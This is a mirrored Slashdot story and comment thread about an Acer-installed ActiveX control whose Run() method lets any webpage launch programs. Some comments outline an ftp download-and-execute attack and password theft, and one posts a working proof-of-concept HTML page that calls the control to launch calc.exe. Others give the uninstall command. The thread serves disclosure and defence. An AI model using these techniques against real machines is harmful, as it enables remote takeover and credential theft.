Slashdot Mirror

← Back to Stories (view on slashdot.org)

Acer May Be Bugging Computers

Posted by Zonk on from the might-want-to-look-into-this dept.

tomjen writes "What if a well known laptop company had silently placed an ActiveX Control on their computers that allowed any webpage to execute any program? Well Acer apparently has and they have (based on the last modified-by date of the file) been doing this since 1998. 'Checking the interface of the control reveals it has a method named "Run()" as shown below. The method supports parameters "Drive", "FileName", and "CmdLine". Isn't it strange for a control that's marked "safe for scripting" to allow a method that is suggestive of possible abuse?'"

18 of 396 comments (clear)

  1. Re:Phew! by mallardtheduck · · Score: 3, Informative

    My HP notebook, bought about 15 months ago not only came with restore disks, but a plain Windows XP SP2 disk and disks for WinDVD and Sonic's CD recording software.

    I don't know about SONY, but in my experience, HP are more generous than most in terms if disks included with their PCs.

  2. Re:to those of us uneducated by Anonymous Coward · · Score: 5, Informative
    Please give examples or something of how this could be used for ill purposes. Yes, I realize it is obvious to most people but I'm a beginner. I do not know what harm can come of the power, in and of itself, of being able to run a program that is already on computer. Would one, through this particular acer thing, be able to pass things to that program and then have that program in turn do other bad things or what? Please give rudimentary examples.
    One could, for example, use the Windows ftp.exe client to download an arbitrary program (e.g. botnet software) and then execute it. I'm certain there are even better ways to do it but this one could work well enough to completely take over the machine.
  3. Re:to those of us uneducated by codepunk · · Score: 3, Informative

    I have not seen the control or have a copy of it but it can be a simple as a couple of lines
    of script in a web page. Now I can possibly own most acer laptops visiting that page.

    The script could do something like this
    ftp somehost
    ftp get somefile
    execute somefile

    Bingo I own your laptop.

    Or say I just ftp your firefox data so I can grab your history, passwords etc.

    --


    Got Code?
  4. Re:present on Aspire 1690 by valeurnutritive · · Score: 5, Informative

    To remove this from your machine.

    Goto Start > Run and type:
    regsvr32 -u lunchapp.ocx

    (-u for uninstall)

  5. Uhh, there already IS an exploit... by nweaver · · Score: 5, Informative

    Read the article: Theres a trivial piece of example "exploit" code running calc.exe.

    But as you can run ANY windows binary with any command line (at least according to the article), actual exploitation is trivial.

    --
    Test your net with Netalyzr
  6. Late again! by whoever57 · · Score: 5, Informative

    Apparently, someone in Brazil noticed this last November

    --
    The real "Libtards" are the Libertarians!
  7. Re:And now that it's publicized... by Ninwa · · Score: 5, Informative

    The class-id was in the article :-) D9998BD0-7957-11D2-8FED-00606730D3AA

  8. Re:Phew! by phalse+phace · · Score: 3, Informative

    Don't know about you, but I wouldn't call $20 a ridiculous amount to pay for a set of restore disks. And you can avoid paying the $20 or so by burning your own set of restore disks... my HP notebook prompted me to do so when I first turned it on. It just burns an image of the restore partition on the C: drive. If you forget or decide you want to do it later, it will/can remind you again in a couple days or so.

  9. @mozilla.org/process/util;1 by MushMouth · · Score: 3, Informative

    Any mozilla extension (chrome) on mozilla/thunderbird/seamonkey/firefox/camino has access to this component which can run anything the user can.

  10. Re:Phew! by belmolis · · Score: 4, Informative

    I recently bought a laptop with Ubuntu pre-installed from The Linux Store, which is in Ontario. I've been perfectly satisfied aside from the minor point that they only offer the choice of Ubuntu and Fedora Core when I would have preferred Debian.

  11. Re:Phew! by Propaganda13 · · Score: 3, Informative

    Corrupt that extra partition and see how far that "restore" disk gets you. It's not the regular Windows restore disk that used to come with computers and it's definitely not a Windows disk. It won't work without the data on the partition.

    $20 for the set of disks + $52.50(Dell refunded price for Windows) is about the same price you could buy Windows XP Home OEM version for.

  12. That's BS by cheros · · Score: 3, Informative

    Sony and HP don't include restore disks because they're harder to keep current than a production disk image - they're DVDs, not CDs.

    All you need to do is burn the images (DVDs) when you get the laptop, and Sony positively nags you repeatedly to do it. Also, if you leave the recovery partition in place you can do it again later.

    As for getting the original DVDs, they don't charge a ridiculous amount (in the $60 region) but they do ask for a ridiculous amount of proof that it's your own laptop and you're not going to share the disks with the world..

    Don't know about HP, but have handled enough Sony laptops :-)

    --
    Insert .sig here. Send no money now. Owner may sue, contents will settle. Batteries not included.
  13. Re:to those of us uneducated by this+great+guy · · Score: 4, Informative
    It is possible to use ftp.exe in such a way. I work in the ITsec field and have used this exploitation technique in the past (step 1: create foo.txt containing ftp commands to download malicious.exe, step 2: run ftp.exe @foo.txt, step 3: run malicious.exe).

    I really have a hard time understanding your mindset. You refuse to believe in the seriousness of the vuln even when people give you an attack vector example. Please, why ?

  14. Re:present on Aspire 1690 by Odin_Tiger · · Score: 3, Informative

    I was under the impression that only the exe went in the second param, and flags went in the final. Shouldn't it be
    hahaha.Run("c", "\\windows\\system32\\regsvr32.exe", "-u lunchapp.ocx")
    ?

    --
    Unpleasantries.
  15. Test/exploit code by Koyaanisqatsi · · Score: 3, Informative

    The code to test for the vulnerability, right from the Brazilian article about it linked on another post. Save it as an html file and browse it with IE.

    <html>
    <body>
    <object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3A A" id="hahaha">
    </object>
    <script>
    hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
    </script>
    </html>
    </body>

  16. Re:Phew! by Tauvix · · Score: 3, Informative

    I work for a major retail chain that sells HP/Compaq notebooks and desktops. HP/Compaq desktops have required you to create the recovery discs for at least 3 years now, however it was not until the August/September 2005 model refresh that they stopped shipping recovery discs with their notebooks.

  17. Re:present on Aspire 1690 by Staale+Nordlie · · Score: 3, Informative

    You're right. It doesn't seem to matter though, as (like I said) it worked fine the way I did it. I got a confirmation message and my Acer laptop no longer runs calc.exe with the code from the article.

  18. Question: is this another Acer backdoor? by GreatBunzinni · · Score: 3, Informative

    When I read this message what popped right on my mind was the existence of an administrator account which camed pre-installed on my Acer laptop. The account is called "ASP.NET Machine A..." which is protected by a password and I'm not able to uninstall it no matter what I try. Can this be another Acer backdoor installed on their systems?

    P.S.: the article's backdoor was also present on my system. those bastards...

    --
    Slashdot, fix your code or at least hire someone who is competent at it to do it for you.